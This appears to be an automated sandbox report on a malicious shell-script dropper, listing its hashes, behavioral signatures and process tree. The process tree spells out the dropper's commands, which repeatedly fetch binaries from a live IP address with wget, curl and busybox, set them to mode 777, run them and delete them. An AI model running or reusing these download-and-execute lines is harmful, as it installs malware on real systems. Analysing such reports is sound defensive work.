Analysis
-
max time kernel
34s -
max time network
70s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 05:44
Static task
static1
Behavioral task
behavioral1
Sample
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh
-
Size
10KB
-
MD5
f89bc50dfbb7c1f6bdcfde6855f8763e
-
SHA1
71f40eb3ade58924b2bb881a77a0e1c5ffa060f5
-
SHA256
73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc
-
SHA512
b6d38452373481067cfa97a4989a56285ac0ad682a202e0ebd7d4bc4671bddaae920074eacd84be1be6a9483d8b74dd810814d85f438c93739f4b18113508f89
-
SSDEEP
192:mjn3I4I7TXm7OCZ/Nv8vEvn65Qy7tXtDtoE7QAp7RRrZOZCZDBB8anPnbngPnlQd:3eJlS6n6uyfpmS/LgPnH/LgPnD9S6n6i
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 842 chmod 797 chmod 836 chmod 860 chmod 873 chmod 880 chmod 919 chmod 690 chmod 724 chmod 782 chmod 866 chmod 892 chmod 812 chmod 848 chmod 898 chmod 699 chmod 709 chmod 925 chmod 759 chmod 776 chmod 931 chmod 886 chmod 904 chmod 913 chmod 740 chmod 827 chmod 854 chmod 937 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM 692 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE 700 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ 710 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik 726 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq 742 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN 761 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX 783 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 798 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm 813 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f 828 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD 837 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y 843 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ 849 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f 855 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD 861 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y 867 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ 874 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM 881 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE 887 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ 893 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik 899 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq 905 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN 914 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc 920 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX 926 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 932 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm 938 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y curl File opened for modification /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm curl File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ curl File opened for modification /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD curl File opened for modification /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 curl File opened for modification /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ curl File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN curl File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE curl File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik curl File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM curl File opened for modification /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX curl File opened for modification /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm curl File opened for modification /tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y curl File opened for modification /tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ curl File opened for modification /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc curl File opened for modification /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM curl File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f curl File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq curl File opened for modification /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX curl File opened for modification /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik curl File opened for modification /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN curl File opened for modification /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc curl File opened for modification /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ curl File opened for modification /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 curl File opened for modification /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f curl File opened for modification /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE curl File opened for modification /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD curl File opened for modification /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq curl
Processes
-
/tmp/73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh/tmp/73c2d44e1df7c3080980bafb0d96b473c0c55c1c2c881bddc84b85e494e60afc.sh1⤵PID:662
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:667
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:679
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:686
-
-
/bin/chmodchmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:698
-
-
/bin/chmodchmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵
- Executes dropped EXE
PID:700
-
-
/bin/rmrm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE2⤵PID:701
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:702
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:705
-
-
/bin/chmodchmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:721
-
-
/bin/chmodchmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik2⤵PID:727
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:728
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:737
-
-
/bin/chmodchmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:755
-
-
/bin/chmodchmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:774
-
-
/bin/chmodchmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc2⤵PID:778
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:779
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:781
-
-
/bin/chmodchmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:794
-
-
/bin/chmodchmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt52⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:809
-
-
/bin/chmodchmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:823
-
-
/bin/chmodchmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:835
-
-
/bin/chmodchmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:841
-
-
/bin/chmodchmod 777 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y./asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:847
-
-
/bin/chmodchmod 777 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ./Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:853
-
-
/bin/chmodchmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:859
-
-
/bin/chmodchmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:865
-
-
/bin/chmodchmod 777 asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y./asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:871
-
-
/bin/chmodchmod 777 Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ./Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm Xz9ULkwZLi7lBEguACB84kLTXA7Rx7h1OQ2⤵PID:875
-
-
